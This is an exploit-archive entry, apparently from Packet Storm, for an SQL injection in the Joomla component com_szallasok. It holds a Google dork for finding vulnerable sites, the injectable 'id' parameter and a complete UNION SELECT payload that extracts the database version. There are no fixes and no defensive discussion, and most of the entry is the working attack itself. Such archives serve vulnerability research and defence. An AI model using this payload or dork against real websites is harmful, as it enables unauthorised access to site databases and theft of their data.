Joomla Szallasok SQL Injection

2012-06-21T00:00:00
ID PACKETSTORM:114000
Type packetstorm
Reporter CoBRa_21
Modified 2012-06-21T00:00:00

Description

                                        
                                            `  
################################################################################################  
# Exploit Title: Joomla Component (com_szallasok) SQL Injection Vulnerability  
#  
# Author : CoBRa_21   
#  
# E-Mail : cobra_21 [at] hotmail.com.tr  
#  
# Google Dork : inurl:com_szallasok  
#  
# Status : High-Risk  
#  
################################################################################################  
#  
# SQL Vulnerability  
#  
# http://127.0.0.1/[PATH]/index.php?option=com_szallasok&mode=8&id=25 (SQL)  
#  
# SQL Exploit  
#  
# +union+select+0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--  
#  
# http://localhost/index.php?option=com_szallasok&mode=8&id=-25 union select 0,1,version(),3,4,  
# 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  
#  
################################################################################################  
# ( PHP Security Expert )   
################################################################################################   
  
  
`